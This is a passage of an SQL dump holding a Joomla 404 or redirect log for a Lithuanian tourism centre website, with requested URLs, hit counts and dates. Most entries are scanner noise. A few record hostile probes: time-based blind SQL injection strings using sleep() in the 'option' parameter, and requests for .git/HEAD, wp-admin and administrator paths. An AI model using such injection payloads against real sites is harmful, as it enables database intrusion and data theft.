00:00:00'),(5815,'https://www.infotytuvenai.lt/index.php/lt/zlib/zstream','','','',9,0,'2023-12-08 03:04:59','0000-00-00 00:00:00'),(5816,'https://www.infotytuvenai.lt/index.php/lt/utils/common','','','',55,0,'2023-12-08 03:04:59','0000-00-00 00:00:00'),(5817,'https://www.infotytuvenai.lt/index.php/lt/zlib/deflate','','','',9,0,'2023-12-08 03:05:00','0000-00-00 00:00:00'),(5818,'https://www.infotytuvenai.lt/index.php/lt/zlib/gzheader','','','',34,0,'2023-12-08 03:05:02','0000-00-00 00:00:00'),(5819,'https://www.infotytuvenai.lt/index.php/lt/utils/strings','','','',9,0,'2023-12-08 03:05:02','0000-00-00 00:00:00'),(5820,'https://www.infotytuvenai.lt/index.php/lt/zlib/messages','','','',9,0,'2023-12-08 03:05:03','0000-00-00 00:00:00'),(5821,'https://www.infotytuvenai.lt/index.php/lt/zlib/constants','','','',10,0,'2023-12-08 03:05:03','0000-00-00 00:00:00'),(5822,'https://www.infotytuvenai.lt/index.php/lt/lib/utils/common','','','',10,0,'2023-12-08 03:05:04','0000-00-00 00:00:00'),(5823,'https://www.infotytuvenai.lt/index.php/lt/lib/zlib/constants','','','',9,0,'2023-12-08 03:05:05','0000-00-00 00:00:00'),(5824,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/inftrees','','','',2,0,'2023-12-08 14:49:49','0000-00-00 00:00:00'),(5825,'https://ww.infotytuvenai.lt/index.php/lt/lib/inflate','','','',5,0,'2023-12-10 16:02:07','0000-00-00 00:00:00'),(5826,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/zlib/gzheader','','','',2,0,'2023-12-11 02:12:09','0000-00-00 00:00:00'),(5827,'https://ww.infotytuvenai.lt/index.php/lt/messages','','','',5,0,'2023-12-11 04:26:31','0000-00-00 00:00:00'),(5828,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/utils/strings','','','',1,0,'2023-12-12 11:58:20','0000-00-00 00:00:00'),(5829,'https://www.infotytuvenai.lt/index.php/en/lankytini-objektai/messages','','','',2,0,'2023-12-12 15:59:23','0000-00-00 00:00:00'),(5830,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/adler32','','','',1,0,'2023-12-15 16:21:28','0000-00-00 00:00:00'),(5831,'https://ww.infotytuvenai.lt/index.php/lt/turizmo-informacija/zlib/deflate','','','',2,0,'2023-12-15 23:21:03','0000-00-00 00:00:00'),(5832,'https://ww.infotytuvenai.lt/index.php/lt/inftrees','','','',4,0,'2023-12-16 03:15:50','0000-00-00 00:00:00'),(5833,'https://ww.infotytuvenai.lt/index.php/lt/turizmo-informacija/crc32','','','',2,0,'2023-12-16 03:38:03','0000-00-00 00:00:00'),(5834,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/zlib/messages','','','',3,0,'2023-12-17 06:17:40','0000-00-00 00:00:00'),(5835,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/trees','','','',3,0,'2023-12-17 06:29:48','0000-00-00 00:00:00'),(5836,'https://ww.infotytuvenai.lt/index.php/lt/inffast','','','',4,0,'2023-12-17 18:16:04','0000-00-00 00:00:00'),(5837,'https://ww.infotytuvenai.lt/index.php/lt/zlib/gzheader','','','',4,0,'2023-12-18 06:11:49','0000-00-00 00:00:00'),(5838,'https://infotytuvenai.lt/index.php/en/?option=com_user&view=register','','https://infotytuvenai.lt/index.php?option=com_user&view=register','',4,0,'2023-12-18 15:17:54','0000-00-00 00:00:00'),(5839,'https://infotytuvenai.lt/index.php/en/component/user?task=register','','https://infotytuvenai.lt/index.php/component/user/?task=register','',4,0,'2023-12-18 15:17:57','0000-00-00 00:00:00'),(5840,'https://infotytuvenai.lt/index.php/en/using-joomla/extensions/components/users-component/registration-form','','https://infotytuvenai.lt/index.php/using-joomla/extensions/components/users-component/registration-form','',3,0,'2023-12-18 15:18:13','0000-00-00 00:00:00'),(5841,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/inffast','','','',3,0,'2023-12-18 19:43:26','0000-00-00 00:00:00'),(5842,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/zlib/deflate','','','',3,0,'2023-12-18 20:28:26','0000-00-00 00:00:00'),(5843,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/utils/common','','','',1,0,'2023-12-18 21:13:25','0000-00-00 00:00:00'),(5844,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/lib/utils/common','','','',1,0,'2023-12-18 21:58:26','0000-00-00 00:00:00'),(5845,'https://ww.infotytuvenai.lt/index.php/lt/zlib/deflate','','','',4,0,'2023-12-20 16:54:08','0000-00-00 00:00:00'),(5846,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/messages','','','',2,0,'2023-12-21 19:34:31','0000-00-00 00:00:00'),(5847,'https://www.infotytuvenai.lt/index.php/en/lankytini-objektai/zlib/zstream','','','',2,0,'2023-12-21 21:59:01','0000-00-00 00:00:00'),(5848,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/inftrees','','','',2,0,'2023-12-22 03:42:00','0000-00-00 00:00:00'),(5849,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/zlib/messages','','','',2,0,'2023-12-22 04:22:55','0000-00-00 00:00:00'),(5850,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/lib/zlib/constants','','','',2,0,'2023-12-22 18:12:44','0000-00-00 00:00:00'),(5851,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/lib/inflate','','','',2,0,'2023-12-24 16:30:25','0000-00-00 00:00:00'),(5852,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/zstream','','','',5,0,'2023-12-25 05:05:25','0000-00-00 00:00:00'),(5853,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/lib/zlib/constants','','','',3,0,'2023-12-25 16:14:03','0000-00-00 00:00:00'),(5854,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/zlib/inflate','','','',2,0,'2023-12-25 16:25:18','0000-00-00 00:00:00'),(5855,'https://www.infotytuvenai.lt/index.php/lt/index.rss','','','',1,0,'2023-12-26 02:26:06','0000-00-00 00:00:00'),(5856,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/trees','','','',2,0,'2023-12-26 22:03:27','0000-00-00 00:00:00'),(5857,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/zlib/zstream','','','',2,0,'2023-12-27 01:46:57','0000-00-00 00:00:00'),(5858,'https://ww.infotytuvenai.lt/index.php/lt/turizmo-informacija/utils/common','','','',1,0,'2023-12-27 06:48:00','0000-00-00 00:00:00'),(5859,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/zlib/deflate','','','',2,0,'2023-12-28 01:46:45','0000-00-00 00:00:00'),(5860,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/lib/zlib/constants','','','',2,0,'2023-12-29 05:28:29','0000-00-00 00:00:00'),(5861,'https://www.infotytuvenai.lt/index.php/en/projektai/utils/common','','','',2,0,'2023-12-29 09:03:39','0000-00-00 00:00:00'),(5862,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/zlib/zstream','','','',2,0,'2023-12-29 11:39:21','0000-00-00 00:00:00'),(5863,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/lib/deflate','','','',2,0,'2023-12-29 13:51:44','0000-00-00 00:00:00'),(5864,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/crc32','','','',2,0,'2023-12-29 18:19:54','0000-00-00 00:00:00'),(5865,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/adler32','','','',2,0,'2023-12-30 05:04:46','0000-00-00 00:00:00'),(5866,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/utils/strings','','','',1,0,'2023-12-30 21:42:20','0000-00-00 00:00:00'),(5867,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/','','','',4,0,'2024-01-02 06:10:13','0000-00-00 00:00:00'),(5868,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/inffast','','','',1,0,'2024-01-02 07:39:29','0000-00-00 00:00:00'),(5869,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/zlib/constants','','','',2,0,'2024-01-02 11:45:17','0000-00-00 00:00:00'),(5870,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/zlib/inflate','','','',2,0,'2024-01-02 14:08:17','0000-00-00 00:00:00'),(5871,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/adler32','','','',2,0,'2024-01-02 16:07:18','0000-00-00 00:00:00'),(5872,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/utils/common','','','',2,0,'2024-01-03 05:24:46','0000-00-00 00:00:00'),(5873,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/messages','','','',2,0,'2024-01-03 05:43:22','0000-00-00 00:00:00'),(5874,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/common','','','',2,0,'2024-01-03 07:53:19','0000-00-00 00:00:00'),(5875,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/utils/common','','','',2,0,'2024-01-04 06:35:46','0000-00-00 00:00:00'),(5876,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/inffast','','','',2,0,'2024-01-04 20:33:59','0000-00-00 00:00:00'),(5877,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/messages','','','',4,0,'2024-01-06 04:56:09','0000-00-00 00:00:00'),(5878,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/zlib/messages','','','',2,0,'2024-01-06 11:41:19','0000-00-00 00:00:00'),(5879,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/lib/deflate','','','',5,0,'2024-01-07 02:16:31','0000-00-00 00:00:00'),(5880,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/trees','','','',2,0,'2024-01-09 04:47:32','0000-00-00 00:00:00'),(5881,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/zlib/messages','','','',2,0,'2024-01-09 20:16:18','0000-00-00 00:00:00'),(5882,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/zlib/inflate','','','',2,0,'2024-01-13 05:05:36','0000-00-00 00:00:00'),(5883,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/utils/strings','','','',2,0,'2024-01-13 09:08:10','0000-00-00 00:00:00'),(5884,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/zlib/constants','','','',2,0,'2024-01-14 12:05:53','0000-00-00 00:00:00'),(5885,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/constants','','','',5,0,'2024-01-14 23:14:05','0000-00-00 00:00:00'),(5886,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/inflate','','','',5,0,'2024-01-17 02:23:51','0000-00-00 00:00:00'),(5887,'https://www.infotytuvenai.lt/index.php/en/lankytini-objektai/common','','','',2,0,'2024-01-19 01:46:50','0000-00-00 00:00:00'),(5888,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/zlib/messages','','','',2,0,'2024-01-20 03:59:42','0000-00-00 00:00:00'),(5889,'https://www.infotytuvenai.lt/index.php/lt/?option=0\'XOR(if(now()=sysdate(),sleep(6),0))XOR\'Z','','','',1,0,'2024-01-20 19:26:48','0000-00-00 00:00:00'),(5890,'https://www.infotytuvenai.lt/index.php/lt/?option=0\'XOR(if(now()=sysdate(),sleep(9),0))XOR\'Z','','','',1,0,'2024-01-20 19:26:48','0000-00-00 00:00:00'),(5891,'https://www.infotytuvenai.lt/index.php/lt/?option=0\'XOR(if(now()=sysdate(),sleep(3),0))XOR\'Z','','','',1,0,'2024-01-20 19:26:48','0000-00-00 00:00:00'),(5892,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/messages','','','',2,0,'2024-01-23 06:31:58','0000-00-00 00:00:00'),(5893,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/lib/zlib/constants','','','',2,0,'2024-01-24 20:39:58','0000-00-00 00:00:00'),(5894,'https://www.infotytuvenai.lt/index.php/en/lankytini-objektai/lib/utils/common','','','',2,0,'2024-01-25 09:27:18','0000-00-00 00:00:00'),(5895,'https://ww.infotytuvenai.lt/index.php/lt/turizmo-informacija/lib/utils/common','','','',2,0,'2024-01-30 23:02:01','0000-00-00 00:00:00'),(5896,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/adler32','','','',2,0,'2024-02-02 10:47:13','0000-00-00 00:00:00'),(5897,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/zlib/deflate','','','',2,0,'2024-02-02 22:40:53','0000-00-00 00:00:00'),(5898,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/lib/inflate','','','',2,0,'2024-02-03 04:57:24','0000-00-00 00:00:00'),(5899,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/zlib/zstream','','','',3,0,'2024-02-03 07:34:35','0000-00-00 00:00:00'),(5900,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/zlib/messages','','','',1,0,'2024-02-03 07:55:02','0000-00-00 00:00:00'),(5901,'https://ww.infotytuvenai.lt/index.php/lt/turizmo-informacija/lib/deflate','','','',2,0,'2024-02-04 16:06:12','0000-00-00 00:00:00'),(5902,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/crc32','','','',2,0,'2024-02-05 18:15:46','0000-00-00 00:00:00'),(5903,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/gzheader','','','',4,0,'2024-02-06 07:15:52','0000-00-00 00:00:00'),(5904,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/lib/inflate','','','',1,0,'2024-02-08 09:11:34','0000-00-00 00:00:00'),(5905,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/lib/deflate','','','',1,0,'2024-02-13 00:03:53','0000-00-00 00:00:00'),(5906,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/common','','','',2,0,'2024-02-14 16:51:36','0000-00-00 00:00:00'),(5907,'https://www.infotytuvenai.lt/index.php/en/projektai/messages','','','',1,0,'2024-02-16 10:02:38','0000-00-00 00:00:00'),(5908,'https://www.infotytuvenai.lt/index.php/en/projektai/zlib/messages','','','',2,0,'2024-02-17 19:52:10','0000-00-00 00:00:00'),(5909,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/zlib/gzheader','','','',1,0,'2024-02-17 21:12:41','0000-00-00 00:00:00'),(5910,'https://www.infotytuvenai.lt/index.php/en/apie-centra/inftrees','','','',2,0,'2024-02-18 18:47:40','0000-00-00 00:00:00'),(5911,'https://www.infotytuvenai.lt/index.php/en/apie-centra/lib/inflate','','','',2,0,'2024-02-19 04:36:20','0000-00-00 00:00:00'),(5912,'https://www.infotytuvenai.lt/index.php/en/apie-centra/common','','','',2,0,'2024-02-19 06:32:50','0000-00-00 00:00:00'),(5913,'https://www.infotytuvenai.lt/index.php/en/apie-centra/zlib/deflate','','','',2,0,'2024-02-19 06:55:06','0000-00-00 00:00:00'),(5914,'https://www.infotytuvenai.lt/index.php/en/apie-centra/adler32','','','',2,0,'2024-02-19 23:07:52','0000-00-00 00:00:00'),(5915,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/crc32','','','',2,0,'2024-02-26 17:12:54','0000-00-00 00:00:00'),(5916,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/zlib/gzheader','','','',2,0,'2024-02-28 04:13:24','0000-00-00 00:00:00'),(5917,'https://www.infotytuvenai.lt/index.php/lt/wp-admin/','','','',1,0,'2024-02-28 13:26:22','0000-00-00 00:00:00'),(5918,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/trees','','','',1,0,'2024-02-28 17:54:30','0000-00-00 00:00:00'),(5919,'https://ww.infotytuvenai.lt/index.php/lt/apie-centra/zlib/gzheader','','','',2,0,'2024-02-29 00:15:51','0000-00-00 00:00:00'),(5920,'https://www.infotytuvenai.lt/index.php/en/apie-centra/lib/deflate','','','',2,0,'2024-03-02 06:43:58','0000-00-00 00:00:00'),(5921,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/zlib/zstream','','','',2,0,'2024-03-02 12:09:18','0000-00-00 00:00:00'),(5922,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/deflate','','','',4,0,'2024-03-04 19:25:20','0000-00-00 00:00:00'),(5923,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/utils/strings','','','',4,0,'2024-03-05 23:34:15','0000-00-00 00:00:00'),(5924,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/zlib/zstream','','','',2,0,'2024-03-06 02:55:44','0000-00-00 00:00:00'),(5925,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/adler32','','','',2,0,'2024-03-06 02:57:00','0000-00-00 00:00:00'),(5926,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/lib/zlib/constants','','','',2,0,'2024-03-06 04:24:42','0000-00-00 00:00:00'),(5927,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/inftrees','','','',2,0,'2024-03-06 19:15:00','0000-00-00 00:00:00'),(5928,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/inffast','','','',2,0,'2024-03-07 19:07:04','0000-00-00 00:00:00'),(5929,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/zlib/constants','','','',2,0,'2024-03-07 21:12:03','0000-00-00 00:00:00'),(5930,'https://www.infotytuvenai.lt/index.php/en/lankytini-objektai/zlib/inflate','','','',2,0,'2024-03-07 22:40:17','0000-00-00 00:00:00'),(5931,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/55-tytuvenu-festivalis/zlib/deflate','','','',1,0,'2024-03-08 08:06:47','0000-00-00 00:00:00'),(5932,'https://www.infotytuvenai.lt/index.php/lt//administrator/','','','',2,0,'2024-03-10 12:40:19','0000-00-00 00:00:00'),(5933,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/zlib/deflate','','','',2,0,'2024-03-28 09:31:54','0000-00-00 00:00:00'),(5934,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/zlib/deflate','','','',2,0,'2024-03-28 10:20:53','0000-00-00 00:00:00'),(5935,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/utils/common','','','',2,0,'2024-03-28 11:28:53','0000-00-00 00:00:00'),(5936,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf','','','',8,0,'2024-03-28 14:37:56','0000-00-00 00:00:00'),(5937,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/apiecentra/veiklos_planas_2024.pdf','','','',5,0,'2024-03-28 14:51:01','0000-00-00 00:00:00'),(5938,'https://ww.infotytuvenai.lt/index.php/lt/lankytini-objektai/lib/inflate','','','',2,0,'2024-03-28 17:11:07','0000-00-00 00:00:00'),(5939,'https://ww.infotytuvenai.lt/index.php/lt/zlib/zstream','','','',5,0,'2024-04-11 05:38:53','0000-00-00 00:00:00'),(5940,'https://ww.infotytuvenai.lt/index.php/lt/common','','','',4,0,'2024-04-12 01:19:43','0000-00-00 00:00:00'),(5941,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/zlib/messages','','','',3,0,'2024-04-14 05:28:23','0000-00-00 00:00:00'),(5942,'https://www.infotytuvenai.lt/index.php/lt/component/','','','',4,0,'2024-04-14 06:43:10','0000-00-00 00:00:00'),(5943,'https://www.infotytuvenai.lt/index.php/en/apie-centra/crc32','','','',2,0,'2024-04-17 22:26:04','0000-00-00 00:00:00'),(5944,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/inffast','','','',2,0,'2024-04-20 10:19:51','0000-00-00 00:00:00'),(5945,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/zlib/gzheader','','','',2,0,'2024-04-21 23:50:13','0000-00-00 00:00:00'),(5946,'https://www.infotytuvenai.lt/index.php/en/apie-centra/zlib/messages','','','',2,0,'2024-04-23 12:08:58','0000-00-00 00:00:00'),(5947,'https://infotytuvenai.lt/index.php/lt/OBJaMg2dwciGT/ZsytuStULJE7liCDKor/6irdFmBzDP2T','','','',1,0,'2024-04-28 01:34:49','0000-00-00 00:00:00'),(5948,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/common','','','',2,0,'2024-04-28 07:42:27','0000-00-00 00:00:00'),(5949,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/inffast','','','',2,0,'2024-04-28 17:14:58','0000-00-00 00:00:00'),(5950,'https://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/','','https://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/33-kava','',5,0,'2024-04-29 12:32:22','0000-00-00 00:00:00'),(5951,'https://www.infotytuvenai.lt/index.php/lt/ ','','https://zemaitijosstd.lrv.lt/','',2,0,'2024-04-30 07:49:40','0000-00-00 00:00:00'),(5952,'https://www.infotytuvenai.lt/index.php/lt/sitemap.xml','','','',30,0,'2024-05-01 10:13:00','0000-00-00 00:00:00'),(5953,'https://www.infotytuvenai.lt/index.php/lt/images/stories/apiecentra/veiklos_planas_2024.pdf','','','',9,0,'2024-05-02 09:31:08','0000-00-00 00:00:00'),(5954,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf','','','',8,0,'2024-05-02 09:53:42','0000-00-00 00:00:00'),(5955,'https://www.infotytuvenai.lt/index.php/en/component/content/article/56-tytuvenu-festivalis/naujienos/','','','',3,0,'2024-05-10 00:21:35','0000-00-00 00:00:00'),(5956,'https://www.infotytuvenai.lt/index.php/lt/component/user','','https://www.infotytuvenai.lt/index.php/component/user/?task=register','',25,0,'2024-05-21 07:15:59','0000-00-00 00:00:00'),(5957,'https://infotytuvenai.lt/index.php/lt/favicon.ico','','','',68,0,'2024-05-23 02:04:39','0000-00-00 00:00:00'),(5958,'https://ww.infotytuvenai.lt/index.php/lt/crc32','','','',4,0,'2024-05-30 07:57:08','0000-00-00 00:00:00'),(5959,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/53-veikla/','','','',3,0,'2024-06-01 09:37:37','0000-00-00 00:00:00'),(5960,'https://ww.infotytuvenai.lt/index.php/lt/trees','','','',5,0,'2024-06-05 11:49:35','0000-00-00 00:00:00'),(5961,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/utils/common','','','',5,0,'2024-06-05 22:13:39','0000-00-00 00:00:00'),(5962,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/inffast','','','',6,0,'2024-06-06 13:55:58','0000-00-00 00:00:00'),(5963,'https://www.infotytuvenai.lt/index.php/en/component/content/article/44-paskutinesnaujienos/','','','',6,0,'2024-06-08 02:52:02','0000-00-00 00:00:00'),(5964,'https://ww.infotytuvenai.lt/index.php/lt/utils/common','','','',7,0,'2024-06-10 02:28:36','0000-00-00 00:00:00'),(5965,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/','','','',2,0,'2024-06-12 21:53:14','0000-00-00 00:00:00'),(5966,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/47-piligrimai/piligrimai','','','',5,0,'2024-06-14 00:23:34','0000-00-00 00:00:00'),(5967,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/43-apie-centra/general','','','',2,0,'2024-06-14 02:14:18','0000-00-00 00:00:00'),(5968,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/56-tytuvenu-festivalis/naujienos','','','',5,0,'2024-06-14 05:14:22','0000-00-00 00:00:00'),(5969,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/','','','',4,0,'2024-06-14 05:26:50','0000-00-00 00:00:00'),(5970,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/51-vienuolynas/vienuolynas','','','',2,0,'2024-06-14 16:01:23','0000-00-00 00:00:00'),(5971,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/istatai.pdf','','','',2,0,'2024-06-16 01:30:44','0000-00-00 00:00:00'),(5972,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/2021_2025_m_starteginis_veiklos_planas.pdf','','','',3,0,'2024-06-16 05:31:45','0000-00-00 00:00:00'),(5973,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/43-apie-centra/','','','',3,0,'2024-06-19 07:31:11','0000-00-00 00:00:00'),(5974,'https://www.infotytuvenai.lt/index.php/lt//contact','','','',7,0,'2024-06-20 02:57:44','0000-00-00 00:00:00'),(5975,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/','','','',4,0,'2024-06-20 08:20:03','0000-00-00 00:00:00'),(5976,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/41-apie-centra/projektai','','','',2,0,'2024-06-21 12:05:05','0000-00-00 00:00:00'),(5977,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/58-trasos/','','','',4,0,'2024-06-26 13:45:39','0000-00-00 00:00:00'),(5978,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/46-tytuvenai/apie-tytuvenus','','','',4,0,'2024-06-27 01:40:52','0000-00-00 00:00:00'),(5979,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/','','','',1,0,'2024-06-28 22:03:54','0000-00-00 00:00:00'),(5980,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/53-veikla/','','','',2,0,'2024-06-28 23:32:28','0000-00-00 00:00:00'),(5981,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/56-tytuvenu-festivalis/naujienos/','','','',4,0,'2024-06-30 11:23:04','0000-00-00 00:00:00'),(5982,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra','','','',1,0,'2024-07-02 15:07:26','0000-00-00 00:00:00'),(5983,'https://www.infotytuvenai.lt/index.php/lt/index.php/lt','','https://www.infotytuvenai.lt/index.php/index.php','',2,0,'2024-07-05 05:09:07','0000-00-00 00:00:00'),(5984,'https://infotytuvenai.lt/index.php/lt/.git/HEAD','','https://infotytuvenai.lt/index.php/.git/HEAD','',2,0,'2024-07-06 12:28:43','0000-00-00 00:00:00'),(5985,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',2,0,'2024-07-10 10:50:06','0000-00-00 00:00:00'),(5986,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',2,0,'2024-07-10 13:45:06','0000-00-00 00:00:00'),(5987,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',2,0,'2024-07-10 23:27:37','0000-00-00 00:00:00'),(5988,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf','','','',2,0,'2024-07-11 04:39:19','0000-00-00 00:00:00'),(5989,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf','','','',2,0,'2024-07-11 09:17:24','0000-00-00 00:00:00'),(5990,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/apiecentra/veiklos_planas_2024.pdf','','','',2,0,'2024-07-11 13:01:45','0000-00-00 00:00:00'),(5991,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',2,0,'2024-07-12 07:22:36','0000-00-00 00:00:00'),(5992,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/41-apie-centra/','','','',3,0,'2024-07-13 18:08:20','0000-00-00 00:00:00'),(5993,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',2,0,'2024-07-14 21:32:34','0000-00-00 00:00:00'),(5994,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf','','','',2,0,'2024-07-15 00:44:43','0000-00-00 00:00:00'),(5995,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf','','','',1,0,'2024-07-15 01:46:17','0000-00-00 00:00:00'),(5996,'https://ww.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/','','','',2,0,'2024-07-28 21:08:39','0000-00-00 00:00:00'),(5997,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/trees','','','',3,0,'2024-07-31 10:27:14','0000-00-00 00:00:00'),(5998,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/utils/common','','','',3,0,'2024-07-31 10:46:21','0000-00-00 00:00:00'),(5999,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/common','','','',3,0,'2024-07-31 12:26:21','0000-00-00 